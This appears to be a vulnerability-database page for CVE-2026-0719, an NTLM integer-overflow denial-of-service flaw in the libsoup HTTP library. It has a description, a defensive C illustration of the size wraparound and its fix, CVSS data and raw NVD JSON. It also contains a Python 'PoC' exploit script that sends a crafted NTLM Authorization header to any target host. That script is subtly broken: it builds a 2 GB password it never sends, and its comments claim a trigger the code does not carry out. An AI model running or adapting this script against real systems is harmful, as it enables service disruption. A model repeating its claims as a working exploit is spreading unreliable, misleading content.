Security Vulnerability Report
CVE-2026-0719 CVSS 8.6 HIGH

CVE-2026-0719

Published: 2026-01-08 13:15:43
Last Modified: 2026-04-15 00:35:42

Description

A flaw was identified in the NTLM authentication handling of the libsoup HTTP library, used by GNOME and other applications for network communication. When processing extremely long passwords, an internal size calculation can overflow due to improper use of signed integers. This results in incorrect memory allocation on the stack, followed by unsafe memory copying. As a result, applications using libsoup may crash unexpectedly, creating a denial-of-service risk.
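The failure mode described above, as an added illustration rather than libsoup's actual code: `wrapped_signed_size` shows what a signed 32-bit size becomes once an assumed `length * 2` calculation wraps, and `expand_password` is the bounded, heap-allocating form of the same step. The function names, the doubling step and the 4096-byte limit are assumptions made for this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Illustrative only: hypothetical helpers, not libsoup's code. The
 * "two output bytes per password byte" expansion is an assumed size
 * calculation standing in for the one the advisory refers to. */

/* Value a signed 32-bit computation of len * 2 ends up holding once it
 * wraps. Computed in unsigned arithmetic so the demonstration itself
 * has no undefined behaviour. A negative or tiny result used as a
 * stack allocation size, followed by a copy of the real length, is the
 * crash pattern the description outlines. */
int32_t wrapped_signed_size(size_t len)
{
    uint32_t product = (uint32_t)len * 2u;
    int32_t out;
    memcpy(&out, &product, sizeof out);
    return out;
}

#define MAX_PASSWORD_BYTES 4096u   /* assumed policy limit */

/* Hardened pattern: size_t arithmetic, an explicit upper bound checked
 * before multiplying, and heap allocation instead of a stack buffer
 * whose size depends on input. Returns NULL when the input is
 * rejected or allocation fails; the caller frees the result. */
unsigned char *expand_password(const char *password, size_t *out_len)
{
    size_t len = strlen(password);
    if (len > MAX_PASSWORD_BYTES || len > SIZE_MAX / 2)
        return NULL;
    size_t need = len * 2;
    unsigned char *buf = malloc(need ? need : 1);
    if (buf == NULL)
        return NULL;
    for (size_t i = 0; i < len; i++) {
        buf[2 * i] = (unsigned char)password[i];
        buf[2 * i + 1] = 0;
    }
    *out_len = need;
    return buf;
}
```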

CVSS Details

CVSS Score: 8.6
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H

Configurations (Affected Products)

No configuration data available.

libsoup < 3.4.x (all affected versions)
Distributions whose GNOME desktop environment uses an affected libsoup version

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import base64
import socket
import struct
import sys

# PoC for CVE-2026-0719: libsoup NTLM Integer Overflow DoS
# This PoC demonstrates sending a malicious NTLM authentication request
# with an oversized password field to trigger integer overflow in libsoup


def create_ntlm_negotiate_packet():
    """Create NTLM NEGOTIATE message with oversized password field"""
    # NTLM Signature
    signature = b'NTLMSSP\x00'
    # Message Type: Negotiate (0x01)
    msg_type = struct.pack('<I', 1)
    # Negotiate Flags
    negotiate_flags = struct.pack('<I', 0xE2088297)
    # Domain Name (empty)
    domain_name = b'\x00\x00'
    # Workstation Name (empty)
    workstation = b'\x00\x00'
    # Oversized password field to trigger integer overflow
    # Password length > INT_MAX will cause signed int overflow
    oversized_password = b'A' * (2**31 + 1000)  # > 2GB
    password_len = struct.pack('<H', len(oversized_password) & 0xFFFF)
    password_max_len = password_len
    password_offset = struct.pack('<I', 0)
    ntlm_packet = signature + msg_type + negotiate_flags + domain_name + workstation
    return ntlm_packet


def exploit(target_host, target_port=80):
    """Send malicious NTLM request to trigger vulnerability"""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_host, target_port))
        # Send HTTP request with malicious NTLM Authorization header
        http_request = b'GET / HTTP/1.1\r\n'
        http_request += b'Host: ' + target_host.encode() + b'\r\n'
        http_request += b'Authorization: NTLM '
        ntlm_data = create_ntlm_negotiate_packet()
        http_request += base64.b64encode(ntlm_data) + b'\r\n\r\n'
        sock.send(http_request)
        print(f'[+] Malicious NTLM request sent to {target_host}:{target_port}')
        print(f'[+] Payload size: {len(ntlm_data)} bytes')
        sock.close()
        return True
    except Exception as e:
        print(f'[-] Error: {e}')
        return False


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f'Usage: python {sys.argv[0]} <target_host>')
        sys.exit(1)
    exploit(sys.argv[1])
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0719", "sourceIdentifier": "[email protected]", "published": "2026-01-08T13:15:43.283", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was identified in the NTLM authentication handling of the libsoup HTTP library, used by GNOME and other applications for network communication. When processing extremely long passwords, an internal size calculation can overflow due to improper use of signed integers. This results in incorrect memory allocation on the stack, followed by unsafe memory copying. As a result, applications using libsoup may crash unexpectedly, creating a denial-of-service risk."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:1948", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2005", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2006", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2007", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2008", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2049", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2182", "source": "[email protected]"}, {"url": 
"https://access.redhat.com/errata/RHSA-2026:2214", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2215", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2216", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2396", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2402", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2512", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2513", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2514", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2528", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2529", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2628", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:2844", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-0719", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2427906", "source": "[email protected]"}, {"url": "https://gitlab.gnome.org/GNOME/libsoup/-/issues/477", "source": "[email protected]"}]}}